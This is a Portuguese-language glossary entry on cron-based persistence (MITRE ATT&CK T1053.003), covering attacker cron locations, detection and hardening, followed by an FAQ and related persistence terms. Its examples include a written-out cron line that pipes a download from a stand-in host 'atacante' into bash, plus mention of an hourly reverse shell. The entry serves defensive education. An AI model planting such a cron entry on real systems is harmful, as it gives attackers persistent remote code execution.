Persistência via cron
O que é Persistência via cron?
Persistência via cronTécnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido.
A persistência via cron (MITRE ATT&CK T1053.003) ataca o daemon cron do Unix e suas variantes (anacron, fcron, temporizadores do systemd). Os atacantes adicionam entradas em /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou crontabs de utilizador (crontab -e). Cargas comuns são reverse shells de uma linha, downloads com curl ou scripts em /tmp. Como o cron corre como root ou como o utilizador proprietário, a técnica é fiável e trivial após o acesso inicial. Deteção: monitorização de integridade dos diretórios cron, regras auditd, baseline de tarefas esperadas e alertas EDR sobre shells geradas pelo cron. Endurecimento: restringir o crontab, montar /tmp com noexec e ativar auditoria do systemd-cron quando disponível.
● Exemplos
- 01
Adicionar * * * * * curl -s http://atacante/sh | bash em /etc/cron.d/update.
- 02
Colocar um script em /etc/cron.hourly/ para reabrir uma reverse shell todas as horas.
● Perguntas frequentes
O que é Persistência via cron?
Técnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido. Pertence à categoria Ataques e ameaças da cibersegurança.
O que significa Persistência via cron?
Técnica de persistência em Linux e Unix que utiliza cron, anacron ou temporizadores do systemd para reexecutar código do atacante num intervalo ou evento do sistema escolhido.
Como funciona Persistência via cron?
A persistência via cron (MITRE ATT&CK T1053.003) ataca o daemon cron do Unix e suas variantes (anacron, fcron, temporizadores do systemd). Os atacantes adicionam entradas em /etc/crontab, /etc/cron.d/, /etc/cron.{hourly,daily,weekly,monthly}/ ou crontabs de utilizador (crontab -e). Cargas comuns são reverse shells de uma linha, downloads com curl ou scripts em /tmp. Como o cron corre como root ou como o utilizador proprietário, a técnica é fiável e trivial após o acesso inicial. Deteção: monitorização de integridade dos diretórios cron, regras auditd, baseline de tarefas esperadas e alertas EDR sobre shells geradas pelo cron. Endurecimento: restringir o crontab, montar /tmp com noexec e ativar auditoria do systemd-cron quando disponível.
Como se defender contra Persistência via cron?
As defesas contra Persistência via cron costumam combinar controles técnicos e práticas operacionais, conforme detalhado na definição acima.
Quais são outros nomes para Persistência via cron?
Nomes alternativos comuns: Persistência crontab, Persistência anacron.
● Termos relacionados
- attacks№ 610
Sequestro via LD_PRELOAD
Técnica Linux de persistência e sequestro de bibliotecas que usa a variável LD_PRELOAD ou /etc/ld.so.preload para injetar código do atacante em processos ligados dinamicamente.
- attacks№ 608
Persistência via launchd
Técnica de persistência no macOS que instala um plist de LaunchDaemon ou LaunchAgent para que o launchd execute código do atacante no arranque, no login ou num gatilho.
- attacks№ 975
Persistência por tarefa agendada
Técnica de persistência e execução em que o atacante cria ou altera uma tarefa agendada do Windows para executar o seu payload com base num gatilho (logon, arranque, temporizador).
- attacks№ 1246
Persistência por subscrição de eventos WMI
Técnica de persistência que regista um filtro e um consumidor permanentes de eventos WMI para executar código do atacante quando ocorre um evento do sistema escolhido.
- attacks№ 914
Persistência por chave Run do registo
Técnica clássica de persistência do Windows que adiciona uma entrada numa chave Run ou RunOnce do registo para executar um binário ou script sempre que o utilizador inicia sessão.